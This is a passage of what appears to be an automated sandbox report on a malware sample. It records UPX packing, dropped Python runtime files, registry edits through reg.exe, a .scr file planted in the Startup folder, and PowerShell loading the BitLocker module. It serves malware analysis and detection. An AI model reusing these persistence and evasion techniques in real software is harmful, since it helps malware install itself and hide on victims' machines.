              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B5DF7 push r10; retf 7_2_00007FFB0B8B5DFA
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B5E18 push rsp; ret 7_2_00007FFB0B8B5E1C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B5CED push rdx; ret 7_2_00007FFB0B8B5CF7
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B5CE5 push r8; ret 7_2_00007FFB0B8B5CEB
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B5CE0 push r10; retf 7_2_00007FFB0B8B5CE2
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B5D06 push r12; ret 7_2_00007FFB0B8B5D08
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C06267D push rbx; retf 7_2_00007FFB0C062685
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0627AE push rsp; iretd 7_2_00007FFB0C0627B9
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C1A3016 push rsi; retf 7_2_00007FFB0C1A3017
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1AB12004 push rax; iretd 7_2_00007FFB1AB12005
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFAA9A6D2A5 pushad ; iretd 20_2_00007FFAA9A6D2A6
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Uses cmd line tools excessively to alter registry or file data
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\unicodedata.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.dllJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\python312.dllJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33962\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2665820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,4_2_00007FF7C2665820
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
